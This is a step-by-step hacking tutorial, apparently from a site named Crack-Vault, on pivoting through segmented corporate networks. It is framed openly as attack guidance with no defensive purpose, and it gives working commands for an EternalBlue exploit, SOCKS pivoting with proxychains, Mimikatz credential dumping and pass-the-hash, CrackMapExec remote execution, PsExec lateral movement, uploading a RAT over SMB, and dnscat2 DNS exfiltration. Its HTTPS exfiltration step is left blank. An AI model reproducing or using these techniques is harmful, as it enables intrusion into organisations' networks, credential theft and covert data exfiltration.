Bypassing Network Segmentation and Pivoting through Internal Networks
When you’re dealing with network segmentation or trying to navigate through multiple internal networks, the key is to pivot through compromised machines and access isolated segments. Network segmentation is a common security measure where parts of the network are separated to limit access and reduce attack surface. However, once you're inside one part of the network, using pivoting techniques allows you to move laterally through restricted zones, gaining access to otherwise unreachable resources like sensitive databases or file servers.
In this guide, we’ll break down pivoting and network segmentation bypassing, exploring how to compromise machines, set up Socks proxies, and tunnel through compromised hosts. By the end, you’ll know how to take control of an entire segmented network, moving through each layer like it’s your personal playground.
Step 1: Understanding Network Segmentation and Pivoting
Network segmentation isolates sensitive systems and critical infrastructure from the general network, often through VLANs, firewalls, or air gaps. Your goal is to find a weak point in one segment (usually through an internal machine) and use it as a pivot to move into more secure sections.
Pivoting involves using a compromised host as a stepping stone to access other machines or networks that would otherwise be unreachable. Think of it as planting a backdoor in one area of a network and then using it as a launchpad to hop through network barriers.
Step 2: Compromising the Initial Host
Before you can pivot, you need to compromise a host within the target network. Use any initial foothold like phishing, exploiting a vulnerability, or brute-forcing weak credentials to gain access to an internal system.
Key Tools for Initial Access:
- Metasploit: Leverage Metasploit’s vast exploit database to find vulnerabilities within services running on internal systems. Once exploited, you can use Meterpreter to establish a foothold and begin pivoting.
- Cobalt Strike: A favorite for red team operations, Cobalt Strike allows you to create advanced payloads and execute post-exploitation commands to move laterally through the network.
- Empire: A post-exploitation framework that helps maintain access to Windows environments with built-in pivoting, lateral movement, and C2 functionalities.
Step 3: Setting Up a Pivot Point with Meterpreter
Once you’ve compromised a host, you can start using it as a pivot point to access additional parts of the network. This is done by setting up a Socks proxy or port forwarding to tunnel your traffic through the compromised machine, allowing you to scan and attack other machines in the network.
Pivoting Using Meterpreter:
Open a Meterpreter Session on the compromised host using Metasploit.
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.1.10
msf> exploit
Set Up Socks Proxy: Meterpreter has built-in capabilities for setting up a Socks proxy. Once set, you can route your traffic through the compromised machine.
msf> use auxiliary/server/socks4a
msf> set SRVPORT 1080
msf> run
Route Traffic Through Socks: On your attacking machine, configure proxychains to use the Socks proxy. This allows you to scan other internal network segments through the compromised machine.
proxychains nmap -sT -Pn 192.168.2.0/24
With this setup, you can scan and interact with other segments of the network that are only accessible through the internal host.
Step 4: Lateral Movement via Pass-the-Hash and Credential Dumping
After pivoting into the internal network, you’ll want to escalate your attack by moving laterally to other machines. A common technique is Pass-the-Hash, which allows you to authenticate to other machines on the network using NTLM hashes without needing clear-text passwords.
Tools for Lateral Movement:
Mimikatz: Dump NTLM hashes from the compromised machine’s memory or grab Kerberos tickets for further lateral movement.
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::pth /user:Administrator /domain:target.local /ntlm:<hash>
CrackMapExec: A post-exploitation tool that automates lateral movement, credential dumping, and executing commands on multiple machines.
crackmapexec smb 192.168.2.0/24 -u Administrator -H <hash> --exec "whoami"
By using Pass-the-Hash or stolen credentials, you can authenticate to other machines on the internal network without triggering alarms. From there, you can compromise additional systems and maintain full control.
Step 5: Bypassing Firewalls and Isolated Segments with SSH Tunneling
If you encounter network firewalls or isolated network segments that are inaccessible from your initial foothold, you can use SSH tunneling to bypass restrictions and forward traffic to otherwise unreachable machines.
SSH Tunneling for Pivoting:
Establish SSH Access: Use compromised credentials to gain SSH access to a server in the internal network.
ssh user@192.168.2.10
Set Up Local Port Forwarding: Use SSH to create a local port on your attacking machine that forwards to the remote network’s internal service (e.g., an internal web server or database).
ssh -L 8080:192.168.3.20:80 user@192.168.2.10
Access Internal Services: Now, you can access services on 192.168.3.20 through localhost:8080 on your attacking machine, effectively bypassing any network segmentation between you and the target service.
Using SSH tunnels, you can interact with internal services or even transfer malicious payloads to systems behind firewalls, giving you access to isolated machines and services.
Step 6: Exploiting Trust Relationships and Windows Admin Shares
One of the key ways to expand your attack in segmented networks is to exploit trust relationships. In many corporate environments, machines in one segment may have trusted access to another (e.g., shared network drives or administrative shares). If you can gain access to these trusted machines, you can potentially gain access to additional network segments.
Exploiting Admin Shares:
Use Metasploit’s PsExec Module to execute commands on other systems using the ADMIN$ share.
msf> use exploit/windows/smb/psexec
msf> set RHOSTS 192.168.3.20
msf> set SMBUser Administrator
msf> set SMBPass <password>
msf> exploit
Upload Malware or Tools via SMB: Once you have access to the shared drives, you can upload your RAT or any other tool and execute it remotely, expanding your control over the internal network.
By exploiting trust relationships and shared resources, you can bypass segmentation and firewalls designed to limit your movement.
Step 7: Exfiltrating Data Through Covert Channels
Once you've compromised valuable machines or segments of the network, the next step is data exfiltration. To stay stealthy, you can use DNS tunneling or HTTPS exfiltration to move data out of the network without triggering alarms.
DNS Tunneling for Data Exfiltration:
- Dnscat2: Use this tool to tunnel data through DNS queries. Since DNS is often allowed through firewalls without scrutiny, you can exfiltrate data undetected.
dnscat2 --dns server_ip
HTTPS Exfiltration:
By using these covert channels, you can exfiltrate sensitive information lwithout raising suspicion.
Conclusion
Bypassing network segmentation and pivoting through internal networks are advanced hacking skills that allow you to move laterally, compromise additional systems, and gain access to highly restricted areas of a target network. Using tools like Meterpreter, Mimikatz, CrackMapExec, and SSH tunneling, you can effectively evade network defenses, access sensitive resources, and ultimately take control of entire network segments. Whether you’re exploiting trust relationships, tunneling through firewalls, or using DNS to exfiltrate data, these techniques ensure that once you’re in, you can go anywhere.
Support Crack-Vault and help us keep providing free tools. Every donation counts!
(BTC) Address: bc1qhhva8uplmkaa3kkwxnux9t3y6l6kmhnwqzktzn
